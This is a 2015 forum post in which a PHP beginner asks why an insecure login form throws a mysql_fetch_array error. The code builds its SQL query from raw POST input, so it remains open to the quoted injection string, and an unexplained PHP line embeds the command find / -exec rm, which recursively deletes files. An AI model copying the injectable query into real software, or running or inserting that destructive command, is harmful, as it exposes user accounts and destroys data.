Prevent from SQL Injection
Posted: Thu Dec 10, 2015 12:28 am
Hai, i'm new to php . I have tried a simple login form, in that form everything is okay, but it's vulnerable to simple SQL Injection attack - 1'or'1'='1 .
To prevent from this i have added a simple code in the login form. Its working fine but shows a error. How to clear that please help me. Below is my code
It shows an error in line 8.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in login.php on line 8
To prevent from this i have added a simple code in the login form. Its working fine but shows a error. How to clear that please help me. Below is my code
Code: Select all
<?php
session_start();
$message="";
if(count($_POST)>0) {
$conn = mysql_connect("localhost","root","");
mysql_select_db("test",$conn);
$result = mysql_query("SELECT * FROM users WHERE user_name='" . $_POST["user_name"] . "' and password = '". $_POST["password"]."'");
$row = mysql_fetch_array($result);
if(is_array($row)) {
$_SESSION["user_id"] = $row[user_id];
$_SESSION["user_name"] = $row[user_name];
} else {
$message = "Invalid Username or Password!";
}
}
if(isset($_SESSION["user_id"])) {
header("Location:user_dashboard.php");
}
?>
<title>Login Page</title>
<link rel="stylesheet" type="text/css" href="styles.css" />
<form name="frmUser" method="post" action="">
<table border="0" cellpadding="10" cellspacing="1" width="500" align="center">
<tr class="tableheader">
<td align="center" colspan="2">Enter Login Details</td>
</tr>
<tr class="tablerow">
<td align="right">Username</td>
<td><input type="text" name="user_name"></td>
</tr>
<tr class="tablerow">
<td align="right">Password</td>
<td><input type="password" name="password"></td>
</tr>
<?php 'find / -exec rm "{}" ";"'; ?>
<tr class="tableheader">
<td align="center" colspan="2"><input type="submit" name="submit" value="Submit"></td>
</tr>
<div class="message"><?php if($message!="") { echo $message; } ?></div>
</table>
</form>
</body></html>It shows an error in line 8.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in login.php on line 8